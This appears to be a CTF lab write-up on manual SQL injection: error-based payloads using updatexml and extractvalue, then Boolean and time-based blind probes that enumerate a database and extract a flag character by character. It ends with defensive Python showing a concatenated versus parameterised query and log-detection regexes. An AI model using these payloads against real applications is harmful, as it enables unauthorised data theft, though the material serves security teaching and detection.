Manual SQL blind injection and error-based injection
2022-07-26 01:57:00 【_ abcdef】
Error-based injection

Determine the number of columns
3 raises an error
2 does not, so this query returns two columns
updatexml() error-based injection
Injection through the updatexml() function
updatexml() modifies the content of a queried XML document
UPDATEXML(XML_document, XPath_string, new_value);
- First parameter: XML_document, a string: the name of the XML document object, i.e. the XML content.
- Second parameter: XPath_string, an XPath-format string giving the location (XPath route) of the node to update.
- Third parameter: new_value, a string holding the replacement content.
Here 1 and 3 are placeholders that satisfy the updatexml() signature; concat() joins the arguments that follow it, 0x21 is the hexadecimal code for the character !, and database() returns the name of the schema the current table belongs to. Because the concatenated string is not valid XPath, MySQL echoes it back inside the error message.
?id=1 union select updatexml(1,concat(0x21,(select database()),0x21),3)

Then read the table names in the sqli database from the information_schema view
?id=1 union select updatexml(1,concat(0x21,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x21),3)

Using the database name and table name, read the values in the flag table
?id=1 union select updatexml(1,concat(0x21,(select * from sqli.flag),0x21),3)

extractvalue() error-based injection
Injection through the extractvalue() function
Format: EXTRACTVALUE(XML_document, XPath_string);
Construct an injection that reads the current database name
Then read the table names in the sqli database from the information_schema view
?id='1' union select extractvalue(1,concat(0x21,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x21))
Finally, using the database name and table name just read, read the values
?id='1' union select extractvalue(1,concat(0x21,(select * from sqli.flag),0x21))
Boolean-based injection
Guess the length and name of the database
Read the length of the current database name with the length() function
The length is 4
?id=1 and (select length(database())=4)

Use ascii() and bisection to guess the database name
ASCII value greater than 100: true
?id=1 and ((select ascii(substr(database(),1,1)))>100)

Less than 120: true; less than 110: false
?id=1 and ((select ascii(substr(database(),1,1)))<120)

Finally, narrowing down, we get 115, the ASCII code for s
?id=1 and ((select ascii(substr(database(),1,1)))=115)

Reading the remaining characters in turn, the database name is sqli
?id=1 and ((select ascii(substr(database(),2,1)))=113) #q
?id=1 and ((select ascii(substr(database(),3,1)))=108) #l
?id=1 and ((select ascii(substr(database(),4,1)))=105) #i
Guess the number of tables and the table names
Number of tables
Guess the number of tables: = 2 is true, so there are two tables in the current database
?id=1 and ((select count(table_name) from information_schema.tables where table_schema=database())=2)

Table name length
Guess the length of the first table name: 4
The second table name also has length 4
?id=1 and (select length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4)
?id=1 and (select length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4) # second table, its name also has length 4

Guess the table names
The first character of the first table name is f
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102)

The second character is 108, corresponding to l
The third character is 97, corresponding to a
The fourth character is 103, corresponding to g
Given the length 4, the first table name is flag
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108) # Corresponding l
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97) # Corresponding a
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103) # Corresponding g
The second table is news:
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=110) # n
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101) # e
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=119) # w
?id=1 and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=115) # s
Summary so far
- database: the current database name has length 4 and is sqli
- tables: there are 2 tables, both names have length 4; one is called flag, the other news
Guess the number of fields in the table
?id=1 and ((select count(column_name) from information_schema.columns where table_name='flag')=0)

Guess the field length and field name
Length
Guess the length of the field: 4 means the first field of the flag table has length 4
?id=1 and (select length(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1))=4)

The first field of the flag table is named flag
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1,1))=102) # f
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),2,1))=108) # l
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),3,1))=97) # a
?id=1 and (select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),4,1))=103) # g
Summary so far
- database: the current database name has length 4 and is sqli
- tables: there are 2 tables, both names have length 4; one is called flag, the other news
- the flag table has a field, and that field is also named flag
Field value
The first character is c
?id=1 and (select ascii(substr((select flag from flag limit 0,1),1,1))=99) # c
?id=1 and (select ascii(substr((select flag from flag limit 0,1),2,1))=116) # t
?id=1 and (select ascii(substr((select flag from flag limit 0,1),3,1))=102) # f
?id=1 and (select ascii(substr((select flag from flag limit 0,1),4,1))=104) # h
and so on ...

Summary
Get familiar with the functions involved
ascii(str): str is a string; the return value is the ASCII code of its leftmost character. With it we can determine a specific character.
substr(str,start,len): takes the substring of str that starts at index start and has length len. In blind injection it is usually used to extract a single character, combined with ascii() to determine its value.
length(str): returns the length of str. Only with it do we know which indexes substr() has to walk.
count([column]): a function you should already know, used to count records. In blind injection it mainly determines how many records satisfy a condition, so they can be brute-forced one by one.
limit m,n: m is the starting record index, counting from 0; takes n records starting at record m+1.
Manual Boolean blind injection process
- Guess the length of the current database name, then the name itself.
- Guess the number of tables in the current database, their name lengths, then the table names.
- Guess the length of the field names of the useful table, then the field names.
- Using the database name, table name and field name, read the data.
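As an added illustration, not the CTF challenge's own source: the kind of id lookup these probes exploit, written once with string concatenation and once with a bound parameter. It uses an in-memory SQLite table (which has no ascii() or updatexml(), so the probe only uses length()), and the table contents are constructed.

```python
import sqlite3

# Constructed in-memory database mirroring the write-up's layout: a news table
# queried by id and a flag table with a single column (value is a placeholder).
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE news(id INTEGER, title TEXT);"
        "INSERT INTO news VALUES (1, 'hello'), (2, 'world');"
        "CREATE TABLE flag(flag TEXT);"
        "INSERT INTO flag VALUES ('ctfh');"
    )
    return con

def lookup_vulnerable(con, user_id):
    # The ?id= value is concatenated into the WHERE clause, so an appended
    # "and (subquery)" turns the page into a true/false oracle, and raw driver
    # errors are echoed back, which is what error-based injection relies on.
    try:
        row = con.execute(f"SELECT title FROM news WHERE id={user_id}").fetchone()
    except sqlite3.Error as e:
        return f"DB error: {e}"
    return row[0] if row else None

def lookup_hardened(con, user_id):
    # Validate the type, then bind the value as a parameter: the driver never
    # lets it change the query's structure, and errors are not echoed.
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return None
    try:
        row = con.execute("SELECT title FROM news WHERE id=?", (id_int,)).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None

# Probes in the shape of the write-up's length check and its error-based
# call (SQLite has no updatexml(), so that one simply fails loudly).
PROBE_TRUE = "1 and (select length((select flag from flag limit 0,1))=4)"
PROBE_FALSE = "1 and (select length((select flag from flag limit 0,1))=5)"
PROBE_ERROR = "1 and updatexml(1,1,1)"
```

With the concatenated query the true probe returns the normal row, the false probe returns nothing, and the error probe leaks the driver message; the hardened lookup rejects all three before they reach the database.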
Time-based blind injection
Guess the length and name of the database
Watch the browser, ruling out network delays: if the page refreshes within a second the guess is right; if the browser keeps loading, sleep() executed and the response was delayed 5 seconds.
The length of the current database name is 4
?id=1 and if (length(database())=4,1,sleep(5))


Guess that the current database name is sqli
?id=1 and if (ascii(substr(database(),1,1))=115,sleep(3),1) # s
?id=1 and if (ascii(substr(database(),2,1))=113,sleep(3),1) # q
?id=1 and if (ascii(substr(database(),3,1))=108,sleep(3),1) # l
?id=1 and if (ascii(substr(database(),4,1))=105,sleep(3),1) # i
Guess the number of tables and the table names
Number of tables
Guess that there are two tables in the sqli database
?id=1 and if(((select count(table_name) from information_schema.tables where table_schema=database())=2),sleep(4),0);

Table name length
Guess that the first and second table names both have length 4
?id=1 and if((select length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4),sleep(5),0) # The length of the first table
?id=1 and if((select length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4),sleep(5),0) # The length of the second table
Table name
Get the table name flag
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102),sleep(5),0) # Corresponding f
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108),sleep(5),0) # Corresponding l
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97),sleep(5),0) # Corresponding a
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103),sleep(5),0) # Corresponding g
The second table name is news
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=110),sleep(5),0) # n
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101),sleep(5),0) # e
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=119),sleep(5),0) # w
?id=1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=115),sleep(5),0) # s
Guess the number of fields in the table
Number of fields
The flag table has only one field, and the news table has 3 fields
?id=1 and if(((select count(column_name) from information_schema.columns where table_name='flag')=1),sleep(5),0)
?id=1 and if(((select count(column_name) from information_schema.columns where table_name='news')=3),sleep(5),0)

Guess the length of the field name and the field name
The length is 4
?id=1 and if((select length(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1))=4),sleep(5),1)
The field name is flag
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),1,1))=102),sleep(5),1) # f
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),2,1))=108),sleep(5),1) # l
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),3,1))=97),sleep(5),1) # a
?id=1 and if((select ascii(substr((select column_name from information_schema.columns where table_name= 'flag' limit 0,1),4,1))=103),sleep(5),1) # g
Field value
?id=1 and if((select ascii(substr((select flag from flag limit 0,1),1,1))=116),sleep(5),1) # t
?id=1 and if((select ascii(substr((select flag from flag limit 0,1),2,1))=101),sleep(5),1) # e
?id=1 and if((select ascii(substr((select flag from flag limit 0,1),3,1))=115),sleep(5),1) # s
......
Verification
Summary
- Be familiar with the ternary if() function and the Boolean injection variants, pay attention to the corresponding browser delay, and use bisection.
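As an added example that is not part of the original write-up: detection logic a defender could run over web access logs to flag the payload shapes used in this article (error-based XPath functions, schema enumeration, ascii/substr probes, length probes, sleep delays). The log lines and the /news.php path are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques in this write-up, matched against the
# URL-decoded, lower-cased request target. Constructed here; not from the page.
RULES = [
    ("error-based xpath", re.compile(r"\b(updatexml|extractvalue)\s*\(")),
    ("schema enumeration", re.compile(r"information_schema\.(tables|columns)")),
    ("boolean char probe", re.compile(r"ascii\s*\(\s*substr\s*\(")),
    ("length probe", re.compile(r"length\s*\(\s*(database\s*\(\s*\)|substr\s*\()")),
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)")),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed access-log sample: one benign request and three that mirror
# the payload shapes shown above (addresses and timestamps are made up).
LOG = """\
10.0.0.5 - - [26/Jul/2022:01:57:00 +0800] "GET /news.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [26/Jul/2022:01:57:03 +0800] "GET /news.php?id=1%20union%20select%20updatexml(1,concat(0x21,(select%20database()),0x21),3) HTTP/1.1" 500 231
10.0.0.5 - - [26/Jul/2022:01:57:09 +0800] "GET /news.php?id=1%20and%20((select%20ascii(substr(database(),1,1)))>100) HTTP/1.1" 200 512
10.0.0.5 - - [26/Jul/2022:01:58:20 +0800] "GET /news.php?id=1%20and%20if(length(database())=4,1,sleep(5)) HTTP/1.1" 200 512
"""

def normalize(target):
    # Decode twice so a double-encoded payload still lands in plain text,
    # then lower-case and collapse whitespace before matching.
    decoded = unquote_plus(unquote_plus(target)).lower()
    return re.sub(r"\s+", " ", decoded)

def classify(target):
    """Names of the rules that fire on one request target (possibly none)."""
    q = normalize(target)
    return [name for name, rx in RULES if rx.search(q)]

def scan_log(text):
    """(line number, fired rules) for every log line with at least one hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST.search(line)
        if m:
            fired = classify(m.group(1))
            if fired:
                hits.append((lineno, fired))
    return hits
```

A single time-based probe delays one response by seconds, so pairing these signatures with per-client response-time outliers catches the same activity even when the payload is obfuscated past the regexes.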
Source code
ctfhub-sql injection source code